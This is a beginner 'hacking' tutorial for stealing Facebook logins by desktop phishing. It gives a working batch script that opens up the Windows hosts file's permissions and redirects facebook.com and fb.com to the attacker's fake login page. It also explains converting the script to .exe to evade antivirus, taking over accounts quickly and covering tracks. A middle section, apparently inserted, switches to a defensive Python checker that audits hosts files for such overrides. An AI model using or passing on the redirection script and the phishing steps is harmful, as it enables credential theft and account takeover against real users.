As I mentioned in my previous article, in this post we will explore
a bit of batch file programming and then move on to applying it
to Facebook hacking by desktop phishing. The advantage here is that
the victim will not be able to identify the fake page, since
the URL in the address bar looks similar to the genuine one.
This tutorial is a non-exhaustive guide for beginners. If you have not read my previous articles “DNS Hijacking”, “Batch programming” and “Hacking facebook accounts using phishing”, I would ask you to read them before continuing, since they give you the prerequisite knowledge of the topics that we are going to discuss today.
Firstly, I’ll give you the batch program that I was talking about in my last post. As we have seen, adding an IP address with a corresponding domain name to the hosts file redirects that domain name to the webpage you choose.
So, we are going to take this to the next level for hacking purposes. We’ll change the hosts file on the victim machine with the help of a batch program and redirect the victim to our fake login page. The only thing you need to consider is sending the batch program to the victim machine and running it.
Here is the batch program that can be used to manipulate the HOSTS file.
@echo off
cacls C:\Windows\System32\drivers\etc\hosts /E /P Everyone:F
cd “C:\Windows\System32\drivers\etc”
echo <ip_address>www.facebook.com >> “hosts”
echo <ip_address>www.fb.com >> “hosts”
echo <ip_address>https://www.facebook.com >> “hosts”
echo <ip_address>https://fb.com >> “hosts”
Replace the <ip_address> with the IP address of your webpage. You can obtain the IP address of your website by pinging it through Command Prompt (you can refer to my previous article on DNS hijacking, where I’ve already described this). Remember to save this in ‘.bat’ format.
Let us now discuss what exactly the above code does. The second line changes the permissions on the ‘hosts’ file (granting Everyone full control) so that it can be edited. Then we move into the directory where the ‘hosts’ file is located and write 4 lines into the file. Those lines are responsible for the redirection of the user: we try to redirect all the possible combinations of Facebook addresses to the IP that is provided.
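Seen from the defending side, the change described above is easy to spot: auditing the hosts file for entries that override login domains catches it. The following is an added example, not code from the original article; the watch list, the function names and the sample hosts content (using documentation-range addresses) are constructed for illustration.

```python
import ipaddress

# Assumed watch list for this example; extend it with the domains your users log in to.
WATCHED_DOMAINS = ("facebook.com", "fb.com")

# Constructed sample content, not taken from any real machine.
SAMPLE_HOSTS = """\
# Sample hosts file
127.0.0.1       localhost
::1             localhost
10.0.0.5        intranet.example.local   # internal wiki
203.0.113.10    www.facebook.com
203.0.113.10    FB.com login.facebook.com
facebook.com    203.0.113.10
"""


def is_watched(host):
    """True if host is a watched domain or one of its subdomains."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in WATCHED_DOMAINS)


def audit_hosts(text):
    """Return (line_no, address, name, reason) for every suspicious entry."""
    findings = []
    for line_no, raw in enumerate(text.splitlines(), start=1):
        entry = raw.split("#", 1)[0].strip()  # comments start at '#'
        if not entry:
            continue
        fields = entry.split()
        address, names = fields[0], fields[1:]
        try:
            ipaddress.ip_address(address)
        except ValueError:
            # Not a valid "address name..." entry; report it if it names a watched domain.
            if any(d in entry.lower() for d in WATCHED_DOMAINS):
                findings.append((line_no, None, " ".join(fields),
                                 "malformed entry naming a watched domain"))
            continue
        for name in names:
            if is_watched(name):
                findings.append((line_no, address, name.lower().rstrip("."),
                                 "watched domain overridden"))
    return findings


if __name__ == "__main__":
    for finding in audit_hosts(SAMPLE_HOSTS):
        print(finding)
```

On a Windows machine the same function can be pointed at the contents of C:\Windows\System32\drivers\etc\hosts; a clean default hosts file produces no findings.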
Remember, executing the above code containing file in the victim’s machine is your personal concern and hence I’m not describing the methodologies of spreading your code.
Note: You can also change the .bat file into .exe file using batch to exe converter. Click the link to learn how to convert a batch file into an executable. Batch files are generally said to be safe and hence there will be no problem with the antivirus programs.
In one of my previous articles, 10 steps to hack facebook accounts, I’ve already described creating a fake page and hosting it; you can follow that article from here onwards to make your own.
Now, once the code has been landed and executed in the victim’s machine he will be redirected to your fake page every time he tries to access facebook. Since the address in the address bar of the fake page remains as ‘www.facebook.com’ there is no chance of identification and hence the victim can be trapped easily.
After the user has entered the credentials the data is written into your ‘passwords.txt’ file and further redirected as mentioned in your ‘login.php’ file. At this moment the victim might come to know that he has been trapped since he was not redirected to the facebook home page and may try to change the password. Hence, you have to stay alert while you trap the victim, you will have to immediately get control over the victim’s account once you receive the password.
Further, you must take care of replacing the old hosts file with the new one without any manipulations so that the victim does not get the smell of the trap!
I’ve got a lot of complaints that while trying to host a fake page on 000webhost.com their web hosting accounts are being blocked. Therefore in my next tutorial I’ll show you how to host your web page on your own computer. So, look forward and pass your comments!!!